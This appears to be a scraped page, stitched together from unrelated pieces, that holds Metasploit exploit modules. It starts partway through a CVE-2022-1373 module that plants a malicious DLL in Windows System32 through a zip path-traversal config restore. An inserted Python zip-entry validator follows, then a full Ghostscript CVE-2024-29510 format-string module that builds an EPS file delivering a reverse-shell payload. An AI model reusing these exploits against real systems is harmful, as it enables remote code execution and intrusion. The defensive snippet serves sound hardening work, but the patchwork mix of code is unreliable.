#{config_zip_path}")<br /><br /> # insert the malicious DLL<br /> Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile|<br /> zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path)<br /> end<br /><br /> # restore the configuration<br /> restore_config_res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => '/runtime/core/config-restore',<br /> 'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}",<br /> 'vars_get' => {<br /> 'User' => datastore['USERNAME'],<br /> 'Signature' => @signature<br /> },<br /> 'data' => File.read(config_zip_path)<br /> })<br /><br /> # no response<br /> unless restore_config_res<br /> fail_with Failure::Unreachable, "#{peer} - Could not restore configuration!"<br /> end<br /><br /> # bad response<br /> unless restore_config_res.code == 200<br /> # for verbosity, show the JSON response<br /> restore_config_res_json = restore_config_res.get_json_document<br /> vprint_error("#{peer} - #{restore_config_res_json}")<br /> fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!"<br /> end<br /> end<br /><br /> # clean up the planted DLL if the session is meterpreter<br /> def on_new_session(session)<br /> super<br /><br /> unless file_dropper_delete_file(session, 'C:\\Windows\\System32\\wbem\\wbemcomn.dll')<br /> # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup<br /> register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')<br /> end<br /> end<br /><br /> # Store the file in the MSF local directory (/root/.msf4/local/) so it can be used when creating the ZIP file<br /> # literal copypasta from exploits/windows/fileformat/cve_2017_8464_lnk_rce<br /> def store_file(data, filename)<br /> if !::File.directory?(Msf::Config.local_directory)<br /> FileUtils.mkdir_p(Msf::Config.local_directory)<br /> end<br /><br /> if filename && !filename.empty?<br /> fname, ext = filename.split('.')<br /> else<br /> fname = "local_#{Time.now.utc.to_i}"<br /> end<br /><br /> fname = ::File.split(fname).last<br /><br /> fname.gsub!(/[^a-z0-9._-]+/i, '')<br /> fname << ".#{ext}"<br /><br /> path = File.join("#{Msf::Config.local_directory}/", fname)<br /> full_path = ::File.expand_path(path)<br /> File.open(full_path, 'wb') { |fd| fd.write(data) }<br /><br /> full_path.dup<br /> end<br />end<br /></code></pre>
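The root cause the module above relies on (CVE-2022-1373) is an archive extractor that trusts entry names. The following is an added example (not Softing's or the Metasploit module's code) of the entry-name check a configuration-restore handler needs before writing anything to disk; the in-memory archive is constructed, and its traversal entry mirrors the name the module plants.

```python
"""
Zip entry-name validation against directory traversal ("zip slip").
Added example; function names and the sample archive are constructed.
"""
import io
import posixpath
import zipfile
from typing import List, Tuple


def is_safe_entry(name: str) -> bool:
    """Return True only for relative names that stay inside the target directory."""
    # Treat backslashes as separators: Windows extractors do, and the
    # traversal entry in the module above uses them.
    norm = name.replace("\\", "/")
    # Absolute paths, drive letters (C:...) and UNC (//host/share) are out.
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return False
    # Collapse "a/./b" and "a/x/../b"; anything that still begins with ".."
    # after collapsing would escape the extraction directory.
    collapsed = posixpath.normpath(norm)
    if collapsed in ("..", ".") or collapsed.startswith("../"):
        return False
    return True


def classify_entries(zip_bytes: bytes) -> Tuple[List[str], List[str]]:
    """Split an archive's entries into (allowed, rejected) by is_safe_entry,
    reading only the central directory; nothing is extracted."""
    allowed: List[str] = []
    rejected: List[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            (allowed if is_safe_entry(info.filename) else rejected).append(info.filename)
    return allowed, rejected


def build_sample_archive() -> bytes:
    """Constructed config-restore archive: one benign entry and one traversal
    entry named like the DLL the module plants (placeholder bytes, not a DLL)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config/settings.xml", "<config/>")
        zf.writestr(
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll",
            b"placeholder",
        )
    return buf.getvalue()


if __name__ == "__main__":
    ok, bad = classify_entries(build_sample_archive())
    print("allowed:", ok)
    print("rejected:", bad)
```

A restore handler that only extracts the `allowed` list, or better refuses the whole archive when `rejected` is non-empty, cannot be made to write outside its configuration directory regardless of how the entry name is spelled.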
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ghostscript Command Execution via Format String',<br /> 'Description' => %q{<br /> This module exploits a format string vulnerability in Ghostscript<br /> versions before 10.03.1 to achieve a SAFER sandbox bypass and execute<br /> arbitrary commands. This vulnerability is reachable via libraries such as<br /> ImageMagick.<br /><br /> This exploit only works against Ghostscript versions 10.03.0 and<br /> 10.01.2. Some offset adjustments will probably be needed to make it<br /> work with other versions.<br /> },<br /> 'Author' => [<br /> 'Thomas Rinsma', # Vuln discovery and PoC<br /> 'Christophe De La fuente' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-29510'],<br /> ['URL', 'https://bugs.ghostscript.com/show_bug.cgi?id=707662'],<br /> ['URL', 'https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/']<br /> ],<br /> 'DisclosureDate' => '2024-03-14',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Linux Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select an x64 fetch payload by default.<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('FILENAME', [true, 'Output Encapsulated PostScript (EPS) file', 'msf.eps']),<br /> OptInt.new('INDEX_OUT_PTR', [true, 'Index of `gp_file *out` on the stack (see the full documentation for details `info -d`)', 5])<br /> ])<br /> end<br /><br /> def exploit<br /> xploit = template.sub('MSF_PAYLOAD', payload.encoded)<br /> xploit = xploit.sub('MSF_IDXOUTPTR', datastore['INDEX_OUT_PTR'].to_s)<br /><br /> file_create(xploit)<br /> print_good('You will need to start a handler for the selected payload first.')<br /> print_good("Example usage with Ghostscript: gs -q -dSAFER -dBATCH -dNODISPLAY #{datastore['FILENAME']}")<br /> print_good("Example usage with ImageMagick: identify #{datastore['FILENAME']}")<br /> end<br /><br /> def template<br /> xploit = File.read(File.join(<br /> Msf::Config.data_directory, 'exploits', 'CVE-2024-29510', 'ghostscript_format_string.eps'<br /> ))<br /><br /> # Remove comments<br /> xploit.gsub!(/\s*% .+$/, '')<br /><br /> # Remove empty lines and lines with a single %; the result of this<br /> # non-destructive gsub is the method's return value<br /> xploit.gsub(/^%?$\n/, '')<br /> end<br /><br />end<br /></code></pre>